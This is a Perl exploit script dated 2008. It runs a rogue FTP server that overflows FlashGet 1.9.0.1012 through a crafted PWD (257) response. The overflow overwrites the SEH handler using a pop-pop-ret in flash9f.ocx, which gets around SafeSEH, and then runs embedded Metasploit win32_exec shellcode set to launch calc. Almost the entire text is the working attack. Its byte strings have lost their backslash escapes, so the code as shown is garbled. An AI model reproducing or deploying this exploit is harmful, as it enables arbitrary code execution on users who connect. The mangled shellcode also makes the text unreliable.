FlashGet,1.9.0.1012,(FTP,PWD,Response),BOF,Exploit,(safeseh)_1012

#!/usr/bin/perl

# k`sOSe 08/17/2008

# bypass safeseh using flash9f.ocx. use warnings;

use strict;

use IO::Socket; # win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

my $shellcode =

"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b".

"xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55".

"x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59".

"xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d".

"x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76".

"xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34".

"x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b".

"x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78".

"x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14".

"x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10";

my $sock = IO::Socket::INET->new( LocalAddr => "0.0.0.0", LocalPort => "21", Listen => 1, Reuse => 1); while(my $csock = $sock->accept())

{ print $csock "220 Hello ;)rn";

read_sock($csock); print $csock "331 pwd pleasern";

read_sock($csock); print $csock "230 OKrn";

read_sock($csock); print $csock "250 CWD command successful.rn";

read_sock($csock); print $csock "257 " . "x22" .

"x41" x 324 . "xEBx06x90x90" . # jump ahead

"x82x01x02x30" . # pop,pop,ret @ flash9f.ocx, thanks macromedia for avoiding /SAFESEH ;) $shellcode . "x90" x 840 .

"x22" .

" is current directory.rn"; close($csock);

exit;

} sub read_sock

{

my ($sock) = @_; my $buf = <$sock>; print "[client] -> $buf"; }